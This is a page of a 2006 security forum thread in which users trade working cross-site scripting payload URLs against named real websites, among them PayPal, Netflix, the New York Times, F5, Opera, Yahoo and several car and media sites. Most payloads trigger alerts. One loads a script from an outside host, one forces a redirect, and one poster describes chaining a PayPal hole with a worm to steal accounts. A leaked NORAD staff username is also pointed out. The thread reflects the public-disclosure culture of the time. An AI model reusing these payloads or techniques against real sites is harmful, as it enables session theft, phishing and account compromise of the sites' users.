Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4567891011121314...LastNext
Current Page: 9 of 65
Re: So it begins
Posted by: maluc
Date: September 27, 2006 03:46PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here<script+src=http://ha.ckers.org/s.js></script>&areacode=&phone=&phoneExt=&region=&howtocontact=phone&action=Submit <- www.f5.com .. this time not unexploitable (double negative, i know)

unsexy version: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,48))%3C/script%3E&areacode=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,49))%3C/script%3E&phone=XSS+here%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E&phoneExt=&region=&howtocontact=phone&action=Submit

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 04:08PM

Ouch. Even if the denial was right, they still have other holes.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 27, 2006 04:41PM

maluc, well done.
But who XSS'd the vendor comments @ http://www.darkreading.com/document.asp?doc_id=104739&WT.svl=news2_1 ?
They are persistant :-/

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:09PM

thanks, and i'm not sure what you mean.. or has it already been removed?

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:46PM

Well, i must say i gave this quite a bit of thought as to whether or not to disclose this. Combined with the myspace hole crafted into another worm, and abusing firefox/ie's(/googles?) password managers, this can very easily net thousands of accounts. If i had a friend in russia .. well, luckily i don't.

Anyway, hopefully its patched soon: https://www.paypal.com/cgi-bin/webscr?cmd=asdf');alert('XSS');eval('p-outside

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:49PM

and for good measure: https://www.paypal.com/cgi-bin/webscr?cmd=asdf%22;alert(%22XSS%22);x%20=%22-outside

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 06:01PM

Nice one, I could only get the second one to work. I've also reported it.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 27, 2006 06:02PM

<cite darkreading>
..
Acutenix and F5 this week said their sites were inaccurately cited with XSS flaws by the hacker bulletin board, Sla.ckers.

Tamara Borg, Acutenix's marketing director, says the company has no XSS or other vulnerabilities on its site. "We are developers of a Web application security software tool which detects such vulnerabilities," she says. "Our Website is scanned on a daily basis to ensure that no such vulnerabilities exist."

F5 says its site did have a vulnerability, but it was an HTML injection issue, not XSS.
..
</cite>
blah, blah, blah, ...

Doesn't need to be commented any more if you have seen the previous PoC links ;-)

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 06:09PM

the first one didn't work for you whiteacid? it works in ff/opera/ie7 for me, with or without cookies .. note that the -outside part is necessary.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 06:13PM

I must be an idiot, it worked now.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 06:45PM

Just thought i would post this to support the cause - next time they say it never happened we can rest assured we have proof.

You see, the only worst then a incompetent website security company is one that fails to admit there flaws (in fact they outright lied about it).



----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 07:09PM

heh, that might be the first image posted on this whole forum _-_

but yes, i agree whole-heartedly .. it's not easy to write XSS free sites for a company, just like trying to write bug-free software. Vulnerabilities are gunna surface .. fixing them promptly shows alot more credibility than the old 'weather balloon' tactics.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 07:12PM

There have been images, some of bandwidth spikes id has posted and one of a charset I posted a while back. This is certainly the first that almost causes horizontal scrolling :p

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 07:37PM

oh ya, i guess i tend to assume stuff id says is on a random page somewhere .-. .. and i didn't remember seeing your charset pic. so ah well, not a first .. touche.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 08:03PM

ok, it's not a xss or anything like that but more a example of how bad coding standards can disclose sensitive information

I found this why viewing some html source code

file:///C:/Documents%20and%20Settings/sauterd/Local%20Settings/Temporary%20Internet%20Files/FrontPageTempDir/buttonCA.jpg

ok, not really a big deal you would assume, some fool (presumably sauterd) has left his windows username and document path in the code... not a biggie... except... this was lifted from http://www.norad.org/.

hence with some simple code viewing i know have a valid norad username.

good thing they aren't in charge of protecting the IT infrastructure

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 09/27/2006 08:03PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 09:25PM

http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=asdf%27%3Balert%28%27XSS%27%29%3Bx+%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&mon1=01&day1=01&year1=1981&mon2=09&day2=27&year2=2006
'insert'; breakout

-maluc



Edited 2 time(s). Last edit at 09/27/2006 09:42PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: cheng
Date: September 27, 2006 10:41PM

http://www.truste.org/ivalidate.php?url=%77%27%20%73%74%79%6C%65%3D%27%78%78%3A%65%78%70%72%65%73%73%69%6F%6E%28%61%6C%65%72%74%28%29%29
It uses EXPRESSION . I'm sorry you might get trouble when you wanna close the window.



Edited 1 time(s). Last edit at 09/27/2006 10:53PM by cheng.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 11:21PM

wow, that's a great first post cheng, because i honestly didn't know of an auto-executing tag property for IE .. it's not auto-executing persay .. but it's a mouseover for the entire webpage. interesting stuff.

is this a deprecated function for eval? it doesn't seem to be well documented anywhere, in particular, w3schools makes no mention.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 11:28PM

http://www.virgin.com/search/?kwd=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=27&y=5

http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&CID=30000&Submit.x=0&Submit.y=0

http://search.forbes.com/search/find?MT=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&sort=&aname=&author=&date=&pub=forbes.com%2Cmagazine%2Cglobal%2Cfyi%2Casap%2Cbest%2Cbow%2Cap%2Cpinnacor%2Cafx

http://www.pcworld.com/search/results?qt=%22%20onmouseover=%22alert('xss');%22 << requires mouseover on almost anything

http://www.aapt.com/%3C/title%3E%3C/head%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E.cfm?nft=1&t=5&p=1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 4 time(s). Last edit at 09/27/2006 11:53PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 27, 2006 11:51PM

http://cgi.yahoo.com/bin/userbug?name=Null&email=null@yahoo.com&phone=1000-000-0000&category=Nowhere&comments=<script>javascript:alert('Hello.')</script>

Found it yesterday.



Edited 1 time(s). Last edit at 09/27/2006 11:52PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:23AM

Well good job ghozts, i have a tough time finding ones on Yahoo.

And welcome to the forum..

looks like i'll have to play some catch up with digital ^^

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:29AM

https://www.netflix.com/LoginHelp?lname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&cardNumber=&routingNumber=&accountNumber=&SubmitButton=Send&forgot=LOGIN

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:32AM

http://www.blockbuster.com/search/PerformKeyWordSearchAction.action?searchType=Movies&schannel=Movies&subChan=&keyword=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+x%3D%22&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 12:37AM

Thanks for the welcome maluc. :)

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 12:51AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www-5.jeep.com:80/searchapp/ui.jsp&ui_mode=question&charset=UTF-8&language=en-US&brandSite=jeep&prior_transaction_id=10602&question_box=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22 << Jeep.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 12:59AM

https://support.opera.com/bin/customer?action=sendPassword&email=GetFireFox%22%3E%3Cscript%3Ealert%28%22Get+FireFox%22%29%3Bdocument.write+%28%27%3CMETA+HTTP-EQUIV%3D%22refresh%22+content%3D%220%3BURL%3Dhttp%3A%2F%2Fwww.getfirefox.net%2F%22%3E%27%29%3B%3C%2Fscript%3E%3Cx+x%3D%22&ok=OK

i really do love opera8 though :x .. i can't find atleast 20% of these without it.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:08AM

By the way, I'm seeing a lot of these POST attacks directed through whiteacid.org, you know that you can put a POST string in a URL right? For example, instead of a post that has uname=User&pwd=Pass you could use site.com/login.php?uname=User&pwd=Pass

You probably do, but I just thought I'd mention it incase.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 01:13AM

@Ghozt

tho i could be wrong a request.form("name") is different from a request.querystring("name") at least in ASP and i know that PHP sort handles that the same way (correct me if i am wrong). However what you are talking about would work when the form was set to a "GET" and not "POST"

Here is an example
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9 << works

http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9 << doesn't work

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:19AM

chevrolet.com works, You used "&" instead of "?" (index.jsp&query=).

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:19AM

Ghozt, when you put the input fields in the url like that, you are making a GET request. Even though most forums submit it as POST, they accept both POST and GET versions.. however some don't. Using the WebDeveloper extensioner for firefox, i always first try to submit it as GET, but for the sites that specifically only allow POST - whiteacid was kinda enough to make that script when i requested it.

But yesh, please try to first test it as a GET, it's more powerful for exploitation (not that anyone here intends to).

And btw, i recently discovered with that opera.com hole, that WebDevelopers conversion doesn't always work even when it should.. using the conversion, it doesn't include the 'action=sendPassword' field which is only part of the url, not the form.. i'm glad i tried adding it manually.

Edit: it too is a trustE site, if that actually is supposed to represent better security. -__-

-maluc



Edited 1 time(s). Last edit at 09/29/2006 07:00PM by maluc.

Options: ReplyQuote
Pages: PreviousFirst...4567891011121314...LastNext
Current Page: 9 of 65


Sorry, only registered users may post in this forum.